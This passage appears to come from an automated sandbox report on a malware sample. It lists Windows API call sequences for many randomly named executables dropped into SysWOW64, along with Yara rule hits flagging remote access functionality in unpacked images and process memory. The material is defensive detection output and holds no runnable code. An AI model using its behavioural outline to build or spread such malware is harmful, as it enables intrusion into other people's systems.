                      Source: C:\Windows\SysWOW64\Bgamkfnl.exe, Code function: 18_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 18_2_00405133
                      Source: C:\Windows\SysWOW64\Bqjacldl.exe, Code function: 19_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 19_2_00405C09
                      Source: C:\Windows\SysWOW64\Bqjacldl.exe, Code function: 19_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 19_2_00405133
                      Source: C:\Windows\SysWOW64\Bnnampcf.exe, Code function: 20_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 20_2_00405C09
                      Source: C:\Windows\SysWOW64\Bnnampcf.exe, Code function: 20_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 20_2_00405133
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exe, Code function: 21_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 21_2_00405C09
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exe, Code function: 21_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 21_2_00405133
                      Source: C:\Windows\SysWOW64\Bgibkegc.exe, Code function: 22_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 22_2_00405C09
                      Source: C:\Windows\SysWOW64\Bgibkegc.exe, Code function: 22_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 22_2_00405133
                      Source: C:\Windows\SysWOW64\Baagdk32.exe, Code function: 23_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 23_2_00405C09
                      Source: C:\Windows\SysWOW64\Baagdk32.exe, Code function: 23_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 23_2_00405133
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exe, Code function: 24_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 24_2_00405C09
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exe, Code function: 24_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 24_2_00405133
                      Source: C:\Windows\SysWOW64\Ccapffke.exe, Code function: 25_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 25_2_00405C09
                      Source: C:\Windows\SysWOW64\Ccapffke.exe, Code function: 25_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 25_2_00405133
                      Source: C:\Windows\SysWOW64\Ceampi32.exe, Code function: 26_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 26_2_00405C09
                      Source: C:\Windows\SysWOW64\Ceampi32.exe, Code function: 26_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 26_2_00405133
                      Source: C:\Windows\SysWOW64\Cnjaioih.exe, Code function: 27_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 27_2_00405C09
                      Source: C:\Windows\SysWOW64\Cnjaioih.exe, Code function: 27_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 27_2_00405133

                      Remote Access Functionality

                      Source: Yara matchFile source: 24.2.Cfnpmb32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Opbieagi.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.Ccapffke.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Cnjaioih.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Bqjacldl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Oceoll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.Dmfdkj32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Nejhbi32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.Qgcpihjl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.Bmlhnnne.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.Pqeoao32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.Feidnc32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.Efgkjnfn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Oglabl32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Ojacofgb.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Bqjacldl.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Olijjb32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.Plgflqpn.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Cnjaioih.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Cfnpmb32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Olijjb32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.Efgkjnfn.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.Bnnampcf.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Onkcje32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.h879iieoae.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.Dnhmjm32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Ogjdllpi.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.Emogai32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Ojacofgb.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Oglabl32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Opbieagi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.Pqeoao32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Bgamkfnl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.Fkogfkdj.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.Camgpi32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.Baagdk32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Ppllkpoo.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.Bnpnbp32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.Ajkolbad.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.Emogai32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Ogjdllpi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.Fhedeo32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.Dfcboo32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Plbmqa32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.Dfcboo32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.Eoappk32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.Bnpnbp32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Oceoll32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.Ajkolbad.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.Feidnc32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.Bmlhnnne.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.Camgpi32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Plbmqa32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.Edgbhcim.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.Fkogfkdj.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.Ccapffke.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.Ceampi32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Odekfoij.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.Bgibkegc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Onkcje32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.Edgbhcim.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Nejhbi32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.Bgibkegc.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.Ceampi32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.Qgcpihjl.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.2.Foaigifk.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Bgamkfnl.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.Fhedeo32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Oeanchcn.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.2.Foaigifk.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.Eoappk32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Ppllkpoo.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Oeanchcn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.Bnnampcf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.h879iieoae.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.Dnhmjm32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.Baagdk32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Odekfoij.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.Plgflqpn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.Dmfdkj32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.1998469389.000000000042A000.00000004.00000001.01000000.00000011.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2006552400.000000000042A000.00000004.00000001.01000000.0000001A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.2029721811.000000000042A000.00000004.00000001.01000000.00000028.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.2021263243.000000000042A000.00000004.00000001.01000000.00000024.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2005214969.000000000042A000.00000004.00000001.01000000.00000018.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.2027822384.000000000042A000.00000004.00000001.01000000.00000026.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2000741077.000000000042A000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1986379697.000000000042A000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1990903099.000000000042A000.00000004.00000001.01000000.0000000F.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2017016443.000000000042A000.00000004.00000001.01000000.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2011076811.000000000042A000.00000004.00000001.01000000.0000001D.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.2029071325.000000000042A000.00000004.00000001.01000000.00000027.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2005778309.000000000042A000.00000004.00000001.01000000.00000019.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2016533194.000000000042A000.00000004.00000001.01000000.0000001F.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2007866947.000000000042A000.00000004.00000001.01000000.0000001B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2004277931.000000000042A000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.2031051927.000000000042A000.00000004.00000001.01000000.0000002A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2008521888.000000000042A000.00000004.00000001.01000000.0000001C.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2001790871.000000000042A000.00000004.00000001.01000000.00000014.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2018453034.000000000042A000.00000004.00000001.01000000.00000021.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2019406612.000000000042A000.00000004.00000001.01000000.00000022.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2019682823.000000000042A000.00000004.00000001.01000000.00000023.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2003694218.000000000042A000.00000004.00000001.01000000.00000016.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.2022377114.000000000042A000.00000004.00000001.01000000.00000025.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1993494029.000000000042A000.00000004.00000001.01000000.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2013905191.000000000042A000.00000004.00000001.01000000.0000001E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2002333377.000000000042A000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.2030625851.000000000042A000.00000004.00000001.01000000.00000029.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1988867655.000000000042A000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2000063573.000000000042A000.00000004.00000001.01000000.00000012.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: h879iieoae.exe PID: 6496, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Nejhbi32.exe PID: 6544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ogjdllpi.exe PID: 6604, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Opbieagi.exe PID: 6648, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Oglabl32.exe PID: 6692, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Olijjb32.exe PID: 6744, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Oeanchcn.exe PID: 6768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Oceoll32.exe PID: 6824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Onkcje32.exe PID: 6860, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Odekfoij.exe PID: 6928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ojacofgb.exe PID: 6992, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ppllkpoo.exe PID: 7064, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Plbmqa32.exe PID: 7092, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Plgflqpn.exe PID: 7084, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Pqeoao32.exe PID: 3808, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Qgcpihjl.exe PID: 2896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ajkolbad.exe PID: 4956, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bmlhnnne.exe PID: 2056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bgamkfnl.exe PID: 2924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bqjacldl.exe PID: 2256, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bnnampcf.exe PID: 5640, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bnpnbp32.exe PID: 6188, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Bgibkegc.exe PID: 1740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Baagdk32.exe PID: 916, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cfnpmb32.exe PID: 1188, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ccapffke.exe PID: 7104, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ceampi32.exe PID: 6460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cnjaioih.exe PID: 4284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Camgpi32.exe PID: 7180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Dmfdkj32.exe PID: 7196, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Dnhmjm32.exe PID: 7212, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Dfcboo32.exe PID: 7228, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Edgbhcim.exe PID: 7244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Emogai32.exe PID: 7260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Efgkjnfn.exe PID: 7276, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Eoappk32.exe PID: 7292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Fkogfkdj.exe PID: 7312, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Fhedeo32.exe PID: 7328, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Feidnc32.exe PID: 7344, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Foaigifk.exe PID: 7368, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,0_2_00403619
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,0_2_00406C29
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_0040129B DsBindWithCredA,CreateFileA,0_2_0040129B
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,0_2_0040129C
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,0_2_00406753
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 1_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,1_2_00403619
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 1_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,1_2_00406C29
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 1_2_0040129B DsBindWithCredA,CreateFileA,1_2_0040129B
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 1_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,1_2_0040129C
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 1_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,1_2_00406753
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 2_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,2_2_00403619
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 2_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,2_2_00406C29
